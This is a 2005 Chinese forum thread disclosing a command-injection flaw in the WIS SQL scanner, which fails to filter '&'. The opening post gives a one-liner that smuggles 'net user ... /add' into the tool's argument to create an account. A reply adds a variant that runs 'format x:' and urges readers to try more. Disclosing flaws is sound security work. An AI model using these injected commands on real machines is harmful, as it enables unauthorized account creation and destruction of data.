返回列表 发帖
千與千尋 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
千與千尋发表于 2005-2-3 14:09 | 只看该作者

小榕的WIS漏洞

Term    : FreeXploiT
Author : ALLyeSNO
Date      : 2005-2-2
WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码
命令行下进入WIS存放目录 输入wis &net user allyesno 12345 /add 则成功执行。
------------------------------------------------------------------------------------
此漏洞利用的时候前提是wis.exe必须以系统管理员权限运行,应用在webshell等方面估计可行性不大。

 
收藏 分享

风幻残林 该用户已被删除
沙发
风幻残林发表于 2005-2-20 17:46 | 只看该作者

小榕的WIS漏洞

这个方法还有很多种
大家还可以依次类推
比如说: wis http://xxx.xxx.xxx/&format x:
        wis http://xxx.xxx.xxx/&net user
等等
具体的大家可以自己实践一下!  

TOP

主题
积分
贝壳
0 个 
注册时间
2007-1-24 
最后登录
2007-1-24 
板凳
copyday发表于 2005-2-20 17:59 | 只看该作者

小榕的WIS漏洞

去试试``

TOP

上苍的女子 该用户已被删除
地板
上苍的女子发表于 2005-5-19 23:40 | 只看该作者

小榕的WIS漏洞

有用吗?

真的有用,吗?

TOP

返回列表 回复 发帖